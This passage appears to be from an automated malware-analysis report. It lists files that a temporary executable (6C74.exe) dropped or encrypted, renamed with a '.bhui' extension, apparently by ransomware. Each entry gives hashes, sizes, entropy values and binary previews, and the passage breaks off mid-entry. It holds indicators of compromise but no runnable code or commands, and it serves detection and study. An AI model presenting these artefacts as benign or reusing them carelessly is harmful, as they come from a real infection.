SHA1:	5AF23789FD135D3A5A32277CB73B9F2DBF6A16A2
SHA-256:	BC9C2EA8FD5C1C79D8BDF7DDA9A243781CB18E20005254BF8A29740E4A05F95E
SHA-512:	B7E90D955A16AF7AE32CBBBFEFD2B3218C438BF4006BE875E7B7E56EEB1345C8DBB8F2F824DA02B07157331D1567C253749ECD04B0D4D0C4A3AD734B1CA07AA4
Malicious:	false
Reputation:	unknown
Preview:	QCOIL...mW.s.So.dx^....._.w.].40...+..zy......uK.f.G...]....N...L,..d..@2.%..x..Q?f..53.5T.{\|.,.K......3.d4E-%.....3.T..&...;.4..LT.r...t.....\"..%....Sx....z?.kpP".N.L.3/hk....G;\|Lv.C.......N0...MN.gBjH."..4n.e9...'...I.." .t...$.....Wv.Nx.J/..SKd.H.N..)...@Q.......8.IR...Q?8..H.^..M.........$x...S.....e.:..t....70........+..D_..:d..z.+lw.WU!A..^})..&.-.z..........F5.....C.&...."V^...`2.O....I.r).w.d..T....[.#..5..fL..\|.8.t[...Rf.V:>o..... ...U..7{I.p.Z).?d./>..x#>6.P............q...&.n....;....jB..H.u..Uhi.g\.....*+.ps._...t..f.Z.5...J..ug.i..9.....8:.5....h...N...4;.;r.3...Y!..J>.....6&.@+.t....jN...j^D}...'...o...k[o.....l.f0k...Qt.G1....J.d..l..Z.J]%v.e..K.2..g.T..jA.2..P2..3.v...F.cA.....j.-....z...i9a.....^g.).g.....s..L?.S.h.y.................Ksl.jF..g:C..zyeUM..%~ ,..cs[=i.o+..].V...c.=..$k.....{9:.....:...h...r...2jf.4.ul... 'm:HH.xr.k.\...M.==,......0E>...-...u....;.n.g..z.!...U..LE../..-P....Ai4x.~..$.LH ...E.q.uT..hs?...w<.....n..U

C:\Users\user\Documents\QCOILOQIKC.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.824094356157092
Encrypted:	false
SSDEEP:	24:sE8yp/L/uo+ybNQwuMB+5mtHb31vjp/S9tZaZS81Hlspu3VIfES9NWVlOWbD:T/XtbNruMWmtHzJj2asM3K5ql7D
MD5:	4CB7010227BB6E861BE5BA7AF8EAC8AB
SHA1:	5AF23789FD135D3A5A32277CB73B9F2DBF6A16A2
SHA-256:	BC9C2EA8FD5C1C79D8BDF7DDA9A243781CB18E20005254BF8A29740E4A05F95E
SHA-512:	B7E90D955A16AF7AE32CBBBFEFD2B3218C438BF4006BE875E7B7E56EEB1345C8DBB8F2F824DA02B07157331D1567C253749ECD04B0D4D0C4A3AD734B1CA07AA4
Malicious:	false
Reputation:	unknown
Preview:	QCOIL...mW.s.So.dx^....._.w.].40...+..zy......uK.f.G...]....N...L,..d..@2.%..x..Q?f..53.5T.{\|.,.K......3.d4E-%.....3.T..&...;.4..LT.r...t.....\"..%....Sx....z?.kpP".N.L.3/hk....G;\|Lv.C.......N0...MN.gBjH."..4n.e9...'...I.." .t...$.....Wv.Nx.J/..SKd.H.N..)...@Q.......8.IR...Q?8..H.^..M.........$x...S.....e.:..t....70........+..D_..:d..z.+lw.WU!A..^})..&.-.z..........F5.....C.&...."V^...`2.O....I.r).w.d..T....[.#..5..fL..\|.8.t[...Rf.V:>o..... ...U..7{I.p.Z).?d./>..x#>6.P............q...&.n....;....jB..H.u..Uhi.g\.....*+.ps._...t..f.Z.5...J..ug.i..9.....8:.5....h...N...4;.;r.3...Y!..J>.....6&.@+.t....jN...j^D}...'...o...k[o.....l.f0k...Qt.G1....J.d..l..Z.J]%v.e..K.2..g.T..jA.2..P2..3.v...F.cA.....j.-....z...i9a.....^g.).g.....s..L?.S.h.y.................Ksl.jF..g:C..zyeUM..%~ ,..cs[=i.o+..].V...c.=..$k.....{9:.....:...h...r...2jf.4.ul... 'm:HH.xr.k.\...M.==,......0E>...-...u....;.n.g..z.!...U..LE../..-P....Ai4x.~..$.LH ...E.q.uT..hs?...w<.....n..U

C:\Users\user\Documents\QCOILOQIKC\CZQKSDDMWR.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846226704344489
Encrypted:	false
SSDEEP:	24:b1Zcye+eieII1QJe0G9Fj8yBuRootyKVC+jtSfcL0S1qIA18XLzJ9WbD:b7KMeJ19Z/AIo74+5wzIA18bzwD
MD5:	63E2AB6B49F38D6C3C780E811D0246EB
SHA1:	C3B4BB2D968A6EEE7953DDA9CD0E406C3CE0367F
SHA-256:	7A608B3AA229BC1E0CD8F80462218FFA3B33D61D7A6CE37A3FC3799C4E65B08E
SHA-512:	BC5C1EA96C4CCAED61A71B187336181D04364D7D162E55BA5183B5547958A00721C28649B92AC9A2DA95467D7ED2AD20977035050CA0A7B7A7812B0481F669D1
Malicious:	false
Reputation:	unknown
Preview:	CZQKS.c...1!.....va.yxoa..x..l....G....xn.z.._c..2.`...U0...#.......U..J,...dw..B.N.+..K..!.>.......<..['].5.z2.>..vB'E.L.0a...S....@.....K...XW!S......e..3Q.]..........&....yu..."..!.[.RR..H/....-.......YS..M!..5..... P..c;..%.U4..&3U^@6!.c..0ce&P..p...kZ.H..^!.....@..v..X............Q...I..0.ml..,_.....P\.3.D...p....n.l.V..P.du..........U...'W.,1.#.s.[..I-.F.N....>....8..j. .#.@.{.Ow.4+p........z....t.I..o...Id`.U.H..i..VN.......y^....XR......%...sR..Cm.Y..1.{L.d.F.f....(.r.f"(.L\....A.Scj..r....Y~S........Jn.OL..L...&....2.U.r.6...+..ua....@.Z].<..4.z..H.:.:).....Z..F.J....%....%..0.....v...,.Ty.......\.......6.o:.fai....82:.4D..l..ql...&1-A.5..!.+0P.1.`...,.#.V{uJ6..{.@S.../..:....@..fm..Sw...9....AV.(2.c......Y.C.V.;..R[A.......G;.....Pkf....P(8 .......g..5.......w[.D.*].}{...J..:.\2..ch.`......\T@....>^........?v~......d.<...K.....P}.....M..MN.n.4..g).j..H.7<.......I..n.!%..G.Wy...p...@k...XB.@$d......e..../

C:\Users\user\Documents\QCOILOQIKC\CZQKSDDMWR.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846226704344489
Encrypted:	false
SSDEEP:	24:b1Zcye+eieII1QJe0G9Fj8yBuRootyKVC+jtSfcL0S1qIA18XLzJ9WbD:b7KMeJ19Z/AIo74+5wzIA18bzwD
MD5:	63E2AB6B49F38D6C3C780E811D0246EB
SHA1:	C3B4BB2D968A6EEE7953DDA9CD0E406C3CE0367F
SHA-256:	7A608B3AA229BC1E0CD8F80462218FFA3B33D61D7A6CE37A3FC3799C4E65B08E
SHA-512:	BC5C1EA96C4CCAED61A71B187336181D04364D7D162E55BA5183B5547958A00721C28649B92AC9A2DA95467D7ED2AD20977035050CA0A7B7A7812B0481F669D1
Malicious:	false
Reputation:	unknown
Preview:	CZQKS.c...1!.....va.yxoa..x..l....G....xn.z.._c..2.`...U0...#.......U..J,...dw..B.N.+..K..!.>.......<..['].5.z2.>..vB'E.L.0a...S....@.....K...XW!S......e..3Q.]..........&....yu..."..!.[.RR..H/....-.......YS..M!..5..... P..c;..%.U4..&3U^@6!.c..0ce&P..p...kZ.H..^!.....@..v..X............Q...I..0.ml..,_.....P\.3.D...p....n.l.V..P.du..........U...'W.,1.#.s.[..I-.F.N....>....8..j. .#.@.{.Ow.4+p........z....t.I..o...Id`.U.H..i..VN.......y^....XR......%...sR..Cm.Y..1.{L.d.F.f....(.r.f"(.L\....A.Scj..r....Y~S........Jn.OL..L...&....2.U.r.6...+..ua....@.Z].<..4.z..H.:.:).....Z..F.J....%....%..0.....v...,.Ty.......\.......6.o:.fai....82:.4D..l..ql...&1-A.5..!.+0P.1.`...,.#.V{uJ6..{.@S.../..:....@..fm..Sw...9....AV.(2.c......Y.C.V.;..R[A.......G;.....Pkf....P(8 .......g..5.......w[.D.*].}{...J..:.\2..ch.`......\T@....>^........?v~......d.<...K.....P}.....M..MN.n.4..g).j..H.7<.......I..n.!%..G.Wy...p...@k...XB.@$d......e..../

C:\Users\user\Documents\QCOILOQIKC\GLTYDMDUST.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840931163195982
Encrypted:	false
SSDEEP:	24:LyCpe3LeBRGLY9ODZ/OzTMV9kXBu/Dny4gK5XJ1mIdvXvHfWbD:5s3LeuvDZ/FCBu/2GXLvvMD
MD5:	C0932628C6B40F0314CF4900B434DBCD
SHA1:	1025B146CFC612895660494A256928C7BD8B5627
SHA-256:	311C49C2798A7D9C5BEDCB2B48189BCC01ACB8CBBFE692F9B58599181D98DC45
SHA-512:	BA91704C27EEBFF12846072F826DF65C3B832C4A08BEA2037DFDD627242975CBC50B43B5DAA8C0DDAA5D904F52807F392793937308286CCC193F29055908996E
Malicious:	false
Reputation:	unknown
Preview:	GLTYD.8.5...y&..x.(..8%x.Y...m.3...'...~.<.{.0P..M1.......Cy.."b......<s..Q.!..U..V..-z.9.&.J..M x................!@.[.J....>M.tU0.....,..S.q.0...@7p....Cl........(5n...Yn.g..+..g.......$...\)`Vd..P.p.#.w+Km.........g..b...ID#.......f.7..v.......rK.I>}..o(......x.A.....[DOn..P.Ay.....1....$dE.2...h...@].....p..5vqN.}&..E.6i............&..~B..).)z"I.G.Q.l...i...=.{i...).....Md.]......[.o9...i..Y@=......GE...%..h/.N.LJ..0@.oJ.L..4DT9@...l...Y#O..O..$.W\|.S.m`~.....(S....A_$.8..P>.Z&[6Q...Jg.........]...,B...Z!..A.K.....eV...y.\.]../..'..\...?....[q..dD..NL...!..\?......E....#....l3G...<VjvSc+.p..U.=.9...O=x..W..+J......+>3.t.......6&.:...rA.#b..)6.)"Q}c......=....C..?I./.X...6..su..+...7...Y.q..@.....,uU....m..b.\Z.pD..q.D..=BMs......!.f..\.MH..(....m....~V...C.y..........m..z4(.}i..4..{..te..V.!...Yuh&..'...?.O/....*.wM...V..L.,A`#..E.\..%.B$@....z.R....k.3KQ...=.....h&j..".....Z/...b........g.x.D......r..eUp..l.1O[...>{_u.n.q;P.B\|.

C:\Users\user\Documents\QCOILOQIKC\GLTYDMDUST.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840931163195982
Encrypted:	false
SSDEEP:	24:LyCpe3LeBRGLY9ODZ/OzTMV9kXBu/Dny4gK5XJ1mIdvXvHfWbD:5s3LeuvDZ/FCBu/2GXLvvMD
MD5:	C0932628C6B40F0314CF4900B434DBCD
SHA1:	1025B146CFC612895660494A256928C7BD8B5627
SHA-256:	311C49C2798A7D9C5BEDCB2B48189BCC01ACB8CBBFE692F9B58599181D98DC45
SHA-512:	BA91704C27EEBFF12846072F826DF65C3B832C4A08BEA2037DFDD627242975CBC50B43B5DAA8C0DDAA5D904F52807F392793937308286CCC193F29055908996E
Malicious:	false
Reputation:	unknown
Preview:	GLTYD.8.5...y&..x.(..8%x.Y...m.3...'...~.<.{.0P..M1.......Cy.."b......<s..Q.!..U..V..-z.9.&.J..M x................!@.[.J....>M.tU0.....,..S.q.0...@7p....Cl........(5n...Yn.g..+..g.......$...\)`Vd..P.p.#.w+Km.........g..b...ID#.......f.7..v.......rK.I>}..o(......x.A.....[DOn..P.Ay.....1....$dE.2...h...@].....p..5vqN.}&..E.6i............&..~B..).)z"I.G.Q.l...i...=.{i...).....Md.]......[.o9...i..Y@=......GE...%..h/.N.LJ..0@.oJ.L..4DT9@...l...Y#O..O..$.W\|.S.m`~.....(S....A_$.8..P>.Z&[6Q...Jg.........]...,B...Z!..A.K.....eV...y.\.]../..'..\...?....[q..dD..NL...!..\?......E....#....l3G...<VjvSc+.p..U.=.9...O=x..W..+J......+>3.t.......6&.:...rA.#b..)6.)"Q}c......=....C..?I./.X...6..su..+...7...Y.q..@.....,uU....m..b.\Z.pD..q.D..=BMs......!.f..\.MH..(....m....~V...C.y..........m..z4(.}i..4..{..te..V.!...Yuh&..'...?.O/....*.wM...V..L.,A`#..E.\..%.B$@....z.R....k.3KQ...=.....h&j..".....Z/...b........g.x.D......r..eUp..l.1O[...>{_u.n.q;P.B\|.

C:\Users\user\Documents\QCOILOQIKC\NWCXBPIUYI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840151799355252
Encrypted:	false
SSDEEP:	24:8htjwQQcZfUy2MbbPdDsd2x9SBOwSIG/9lT2mMf0ZOYZtDAYg6nDEiun6RJWbD:8rjwaLHb5Id2x9SBOwy/9lT2hLYZFXg3
MD5:	BEA01EB10616DF267D6FA7883A090149
SHA1:	A0BD15C031576AE29141EF0B5EA9D9E54E583FA2
SHA-256:	8FD431CED40747D8239B27920D134661596CF4577932A739F3BD4E13CC7BD3F9
SHA-512:	134A34B02D0301FDA65625BD05F7B5654DED6CD2761AD93D937C3818F6F09177662BA393BFDDF2067CAC3D836A0D989FEDABC8223989E1126D3A6B56E190D63F
Malicious:	false
Reputation:	unknown
Preview:	NWCXB-^..+..}...G.r..7\..^...\|..V......%..u...V?...R..5avq...DL.9&C..?...h........q.LIV..........6s..r...y....r.!.q.......v.)l`\|c..)I..\.f$kS-...p...@#.=.l......1....8......PS............._.8.@.O5.,U&......].... .m...p~+M......C...-......Z.C..R..`..O../..y.=N..E....#L^.:&..w]....Yb-.~..}.FB.:....g.c&wS....`.K5.....JK".S.....1e.....Q......G......<0.&`+k..v]#....zN...zf.qE..._w...^.n...J..MZ.....9...y.K.CU,....1Y...wP...-..i.&^'...p.<!..q...".k.C..\[._.Og.?.UeF.......$-...F.j.^'.j%.7B....R.....A4C<yW.w.k.R.Q....[..D..NxD......?...%..).1.&..Sd......0..Xt.N.......3.j#....h....R...1.;....TMS..l.5(..1T.^..a.U4D......v..QGNW0...#.2..j..&q.7.....%.J........N...;v.).q.Z.CXb....!..QN.4I.PY.3.....]C...R$R7..M.y.....;..{...\....?..].k-.\|...'i.....XC....@qt....o.2......;..H.....-M.B.F......\|.)...M..Yb...U.#..\.n<q.9.@z.+.....1zL d.(BS;.Xv.Y..M`... ..~.t...=P..k..K.w.....I8..v.......E8.@...B..+../.....Bhb?J'.,.U.J..U{H..e....Z...L....r.#..9.*Q

C:\Users\user\Documents\QCOILOQIKC\NWCXBPIUYI.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840151799355252
Encrypted:	false
SSDEEP:	24:8htjwQQcZfUy2MbbPdDsd2x9SBOwSIG/9lT2mMf0ZOYZtDAYg6nDEiun6RJWbD:8rjwaLHb5Id2x9SBOwy/9lT2hLYZFXg3
MD5:	BEA01EB10616DF267D6FA7883A090149
SHA1:	A0BD15C031576AE29141EF0B5EA9D9E54E583FA2
SHA-256:	8FD431CED40747D8239B27920D134661596CF4577932A739F3BD4E13CC7BD3F9
SHA-512:	134A34B02D0301FDA65625BD05F7B5654DED6CD2761AD93D937C3818F6F09177662BA393BFDDF2067CAC3D836A0D989FEDABC8223989E1126D3A6B56E190D63F
Malicious:	false
Reputation:	unknown
Preview:	NWCXB-^..+..}...G.r..7\..^...\|..V......%..u...V?...R..5avq...DL.9&C..?...h........q.LIV..........6s..r...y....r.!.q.......v.)l`\|c..)I..\.f$kS-...p...@#.=.l......1....8......PS............._.8.@.O5.,U&......].... .m...p~+M......C...-......Z.C..R..`..O../..y.=N..E....#L^.:&..w]....Yb-.~..}.FB.:....g.c&wS....`.K5.....JK".S.....1e.....Q......G......<0.&`+k..v]#....zN...zf.qE..._w...^.n...J..MZ.....9...y.K.CU,....1Y...wP...-..i.&^'...p.<!..q...".k.C..\[._.Og.?.UeF.......$-...F.j.^'.j%.7B....R.....A4C<yW.w.k.R.Q....[..D..NxD......?...%..).1.&..Sd......0..Xt.N.......3.j#....h....R...1.;....TMS..l.5(..1T.^..a.U4D......v..QGNW0...#.2..j..&q.7.....%.J........N...;v.).q.Z.CXb....!..QN.4I.PY.3.....]C...R$R7..M.y.....;..{...\....?..].k-.\|...'i.....XC....@qt....o.2......;..H.....-M.B.F......\|.)...M..Yb...U.#..\.n<q.9.@z.+.....1zL d.(BS;.Xv.Y..M`... ..~.t...=P..k..K.w.....I8..v.......E8.@...B..+../.....Bhb?J'.,.U.J..U{H..e....Z...L....r.#..9.*Q

C:\Users\user\Documents\QCOILOQIKC\NYMMPCEIMA.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856205535562691
Encrypted:	false
SSDEEP:	24:mWQcunx/ys7OBenpUJk2sz3NAQIoiEiLCUR3eknm0oyWbD:OP/ys7QeEJszdrU8knmJvD
MD5:	B640B1043B17302095958D0588D12094
SHA1:	F5BDE48B3126C84DB4CC914B2A104FEE098A2B4F
SHA-256:	22F3DAD518EC4345AC6FBF9BA4C5ECD5A2836658A614A8AA90C110BD0C4A40AF
SHA-512:	993988B4261D559821A09C3BC2913B964183FC85FA072BC6BF7000CA2FC70671CC15D3898376A49A773E10C63A434C6AF6DB1C4FED75044F04AAA3DC51440EF5
Malicious:	false
Reputation:	unknown
Preview:	NYMMP...v!.&L...FAh.jp....hc....7.T..oa+g.m...(+W.W..._...7_...Iy.y.....j...7e.f.-..sy.l3.a....;.......3..k.yJ.4%.a%..DO...HO....uHd........1...pF#o..d....z..e.k,....].\CW.b... .T..3.o.:.'.C.W.i..f5./,...y.].C.../..;.....sd+cc.l..hw..z..{.7...f?.+.fVZ(..^..4...p0.vG..C.e.a9i...!9....d6..C0Yq.....L...7.I?N.Du^.3o.....!?.3..h4#.v......B.l........%...)\U~....K...f....G[;.].X...1~..{Ol......h........i\....b`.<5..@..V.j..5.4.z.........k.Z.=..'z/..oON.u.Y.B...%.^.~.E...L.{.:a..E.S1?.Q..as..J.#...0...Q......!C...)...J...l..IGz.............U.id....@!..e........!.....@&naj<3XRJy..Qk/z.!.=..1....Wo.....X.LF..<J...3L..S{.t.$:...&.a.LP8.sAm.z..z.$.'4.....>..X...Icc.Rq.kmn/.<..~...C.(. ;.....$R(M.....qV..K...A.o.8.]N.].L{I.{.;...0..w.^.....G.$.........4..i....9.xK..9jVg..[..x)g..dJ..:.v...S(^....k./...X...9..W....E..wc.g.H>.8$.b..I.!8{........}I..F=..N.....Q.`S. K'....Z0.F.S:..".....%jZ....t.9...A..k....<...m..`.? mF.[g.m..g...$<.......?.....

C:\Users\user\Documents\QCOILOQIKC\NYMMPCEIMA.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856205535562691
Encrypted:	false
SSDEEP:	24:mWQcunx/ys7OBenpUJk2sz3NAQIoiEiLCUR3eknm0oyWbD:OP/ys7QeEJszdrU8knmJvD
MD5:	B640B1043B17302095958D0588D12094
SHA1:	F5BDE48B3126C84DB4CC914B2A104FEE098A2B4F
SHA-256:	22F3DAD518EC4345AC6FBF9BA4C5ECD5A2836658A614A8AA90C110BD0C4A40AF
SHA-512:	993988B4261D559821A09C3BC2913B964183FC85FA072BC6BF7000CA2FC70671CC15D3898376A49A773E10C63A434C6AF6DB1C4FED75044F04AAA3DC51440EF5
Malicious:	false
Reputation:	unknown
Preview:	NYMMP...v!.&L...FAh.jp....hc....7.T..oa+g.m...(+W.W..._...7_...Iy.y.....j...7e.f.-..sy.l3.a....;.......3..k.yJ.4%.a%..DO...HO....uHd........1...pF#o..d....z..e.k,....].\CW.b... .T..3.o.:.'.C.W.i..f5./,...y.].C.../..;.....sd+cc.l..hw..z..{.7...f?.+.fVZ(..^..4...p0.vG..C.e.a9i...!9....d6..C0Yq.....L...7.I?N.Du^.3o.....!?.3..h4#.v......B.l........%...)\U~....K...f....G[;.].X...1~..{Ol......h........i\....b`.<5..@..V.j..5.4.z.........k.Z.=..'z/..oON.u.Y.B...%.^.~.E...L.{.:a..E.S1?.Q..as..J.#...0...Q......!C...)...J...l..IGz.............U.id....@!..e........!.....@&naj<3XRJy..Qk/z.!.=..1....Wo.....X.LF..<J...3L..S{.t.$:...&.a.LP8.sAm.z..z.$.'4.....>..X...Icc.Rq.kmn/.<..~...C.(. ;.....$R(M.....qV..K...A.o.8.]N.].L{I.{.;...0..w.^.....G.$.........4..i....9.xK..9jVg..[..x)g..dJ..:.v...S(^....k./...X...9..W....E..wc.g.H>.8$.b..I.!8{........}I..F=..N.....Q.`S. K'....Z0.F.S:..".....%jZ....t.9...A..k....<...m..`.? mF.[g.m..g...$<.......?.....

C:\Users\user\Documents\QCOILOQIKC\QCOILOQIKC.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8556531432458305
Encrypted:	false
SSDEEP:	24:69zrk7qbTRf7U2980RFF6zkTeMeTKlCix6ec9Kkgfdqv2ht3R7WbD:69zQ7qblDlJFFSkTeMeTYxzw084tOD
MD5:	A2563D6378C49AEA600A1407BFD0E663
SHA1:	6ED3DE03876C81A4843364C7FD7944166ADB5F23
SHA-256:	ED0F809D14FB8B91E5DC832AAA6C69728039A33F0AD8CC969FF7E3A66276BCE1
SHA-512:	B3AB3F48ED48FF2A64E4D12F045C01806911F4C7432E14DC965AA6B5D6B9CAB9D1AFC770917E8CAD549AD194EF38C33432CB770149D6F8468F2CB9D1AACFC563
Malicious:	false
Reputation:	unknown
Preview:	QCOIL..t....).x..e..'/...(...Tu...%.`@3.A/..l.^......:s..G...e.?[...AF..M.#.s...=g.!...!2..o...!.b.....t..%...eQ$....5(...<I..w....+.o.E-..F.^.[5.Z..sl....4...m..W... .&!Y.yT^&?9...~.W.i>^...w....dZ.Ry.<.(...VDo....{$...J.[!.....Q.$.)d...h:.z.#.......e..8.=1....I......\.jh....%.(n..].xVu...Tf.}"x..%Ye..&9.q.%....B.....Z.j..k.#...F.h.#.!J.I.%.BU0...1..}e...p.9.:.W.mR..]L_..Q.....r..R0.l.&..#....g.&.j....p..%Z.k8...\|w.l.,B5B.YU9....~.\|..-.`.'.o.....d..t..l.m.....6x...$....z..>7..8.......k....J..b.\|.s...:uExU`})eQ.,...p...n...gH.....[...p...L.....X.<..J..1.z.z.j.....4......gg.T..........-.+M.1}..$.Lc....7...,ycL..66.\......n\|..p}W.}..kI<~ OY_)....n..7.....5...#8.......q...`3.,..E.&....R.:.v..Et...v)Mi.].o.%.^xo&..X.Z):.........{.^.]..v.`..W...!........_...w.N{HU.0Y.h5..U..bU..n...gz....<o....(..<.;.;.:.J.m8..g..&D.%4..........&.VR*..L.Y....H....m.s...~.x.\|...A...F..a.b..V.....8.~ .x..&....[.cHw}.}..vB.i.S...........8.Q.CH.......;.b.......=C..>....2.

C:\Users\user\Documents\QCOILOQIKC\QCOILOQIKC.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8556531432458305
Encrypted:	false
SSDEEP:	24:69zrk7qbTRf7U2980RFF6zkTeMeTKlCix6ec9Kkgfdqv2ht3R7WbD:69zQ7qblDlJFFSkTeMeTYxzw084tOD
MD5:	A2563D6378C49AEA600A1407BFD0E663
SHA1:	6ED3DE03876C81A4843364C7FD7944166ADB5F23
SHA-256:	ED0F809D14FB8B91E5DC832AAA6C69728039A33F0AD8CC969FF7E3A66276BCE1
SHA-512:	B3AB3F48ED48FF2A64E4D12F045C01806911F4C7432E14DC965AA6B5D6B9CAB9D1AFC770917E8CAD549AD194EF38C33432CB770149D6F8468F2CB9D1AACFC563
Malicious:	false
Reputation:	unknown
Preview:	QCOIL..t....).x..e..'/...(...Tu...%.`@3.A/..l.^......:s..G...e.?[...AF..M.#.s...=g.!...!2..o...!.b.....t..%...eQ$....5(...<I..w....+.o.E-..F.^.[5.Z..sl....4...m..W... .&!Y.yT^&?9...~.W.i>^...w....dZ.Ry.<.(...VDo....{$...J.[!.....Q.$.)d...h:.z.#.......e..8.=1....I......\.jh....%.(n..].xVu...Tf.}"x..%Ye..&9.q.%....B.....Z.j..k.#...F.h.#.!J.I.%.BU0...1..}e...p.9.:.W.mR..]L_..Q.....r..R0.l.&..#....g.&.j....p..%Z.k8...\|w.l.,B5B.YU9....~.\|..-.`.'.o.....d..t..l.m.....6x...$....z..>7..8.......k....J..b.\|.s...:uExU`})eQ.,...p...n...gH.....[...p...L.....X.<..J..1.z.z.j.....4......gg.T..........-.+M.1}..$.Lc....7...,ycL..66.\......n\|..p}W.}..kI<~ OY_)....n..7.....5...#8.......q...`3.,..E.&....R.:.v..Et...v)Mi.].o.%.^xo&..X.Z):.........{.^.]..v.`..W...!........_...w.N{HU.0Y.h5..U..bU..n...gz....<o....(..<.;.;.:.J.m8..g..&D.%4..........&.VR*..L.Y....H....m.s...~.x.\|...A...F..a.b..V.....8.~ .x..&....[.cHw}.}..vB.i.S...........8.Q.CH.......;.b.......=C..>....2.

C:\Users\user\Documents\QCOILOQIKC\ZIPXYXWIOY.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8594614346185745
Encrypted:	false
SSDEEP:	24:5H05cr78FOb1LHcMK16d/Ufrz2Lew64yTLzODAzabtQke+uSg1Mi89K3GPDWkLEp:5H06rYFOGMK16dyrzR33nN31h+OG/LEp
MD5:	300326781EFA25C754E5213C62F471D8
SHA1:	411B2BB0C9D8EE05337EC2621DCD1CB578A4A837
SHA-256:	AD4985EAA08B030CA4CCA08114FD2A8EABC3A32C1195382CFA2FC08303686842
SHA-512:	0437B3B2E8E0C31B38F619E9393BBE16EC98837596500A916B4766ACCD85CE2E6F894C76CB87131C71EE4619A636AA96930126F39428C9EE0F9033B68D23BFB6
Malicious:	false
Reputation:	unknown
Preview:	ZIPXY<!,ZL{.Jz.tD..c.5$w..WV.(Jm..m.C9....._..41....j......w.4(..."..t.....................s.y...m`A[...\...R...d..M........ .6C@.G[-....!p._...B`~..b<..Gm.....V.!_"..s..?..ZF....=....j..EgL..`B...PA...!.)..&.....d.A...<..a..D..dc/.....(...&;...$JW..[.....Up.\..O.O. .[>....y.........3}.2)...6..f.r....vA=H.zC.+..Kk=.3..,.j...........g....D...,...s......_5.X...J..v..L+.....1`e.b>=..~....c.VT9....a.j.......+......g.../....V.?..[.."......>.h.#E.9..co.~.s.....;...~..$.o.iv..:pY.@...x.}..z.... ...5Gw@..X........`m..S&(..a.._`.%..v..U.Z9p8_$..%$B.X.z..c$.....Jx.c....en..$.J:..H......e.....*.ZA4"Q.z3.1....I..K.q?@..PP....D....8Y%......W.x.(Q<e@..C..~Iv.A..R.VG.....B..3..."d..x..ra.=fz..~....S1...\|..[&0..._..-.....o..,..'...X......>......f..\|'..........C.^...d#L.!.k.tj..r.t..!..IX.ln..w5..........Z...k.q@.p...\|Jo!<..u..fY+..{h.h.[o).w..#.>..x.>.E..4Q......J...4o..E_.\|..gq.#...a..)....2.DC.ol..@N..\|..8.$0E...T..'.T.#J...$..<'...r..9...eW@.lT

C:\Users\user\Documents\QCOILOQIKC\ZIPXYXWIOY.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8594614346185745
Encrypted:	false
SSDEEP:	24:5H05cr78FOb1LHcMK16d/Ufrz2Lew64yTLzODAzabtQke+uSg1Mi89K3GPDWkLEp:5H06rYFOGMK16dyrzR33nN31h+OG/LEp
MD5:	300326781EFA25C754E5213C62F471D8
SHA1:	411B2BB0C9D8EE05337EC2621DCD1CB578A4A837
SHA-256:	AD4985EAA08B030CA4CCA08114FD2A8EABC3A32C1195382CFA2FC08303686842
SHA-512:	0437B3B2E8E0C31B38F619E9393BBE16EC98837596500A916B4766ACCD85CE2E6F894C76CB87131C71EE4619A636AA96930126F39428C9EE0F9033B68D23BFB6
Malicious:	false
Reputation:	unknown
Preview:	ZIPXY<!,ZL{.Jz.tD..c.5$w..WV.(Jm..m.C9....._..41....j......w.4(..."..t.....................s.y...m`A[...\...R...d..M........ .6C@.G[-....!p._...B`~..b<..Gm.....V.!_"..s..?..ZF....=....j..EgL..`B...PA...!.)..&.....d.A...<..a..D..dc/.....(...&;...$JW..[.....Up.\..O.O. .[>....y.........3}.2)...6..f.r....vA=H.zC.+..Kk=.3..,.j...........g....D...,...s......_5.X...J..v..L+.....1`e.b>=..~....c.VT9....a.j.......+......g.../....V.?..[.."......>.h.#E.9..co.~.s.....;...~..$.o.iv..:pY.@...x.}..z.... ...5Gw@..X........`m..S&(..a.._`.%..v..U.Z9p8_$..%$B.X.z..c$.....Jx.c....en..$.J:..H......e.....*.ZA4"Q.z3.1....I..K.q?@..PP....D....8Y%......W.x.(Q<e@..C..~Iv.A..R.VG.....B..3..."d..x..ra.=fz..~....S1...\|..[&0..._..-.....o..,..'...X......>......f..\|'..........C.^...d#L.!.k.tj..r.t..!..IX.ln..w5..........Z...k.q@.p...\|Jo!<..u..fY+..{h.h.[o).w..#.>..x.>.E..4Q......J...4o..E_.\|..gq.#...a..)....2.DC.ol..@N..\|..8.$0E...T..'.T.#J...$..<'...r..9...eW@.lT

C:\Users\user\Documents\SNIPGPPREP.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
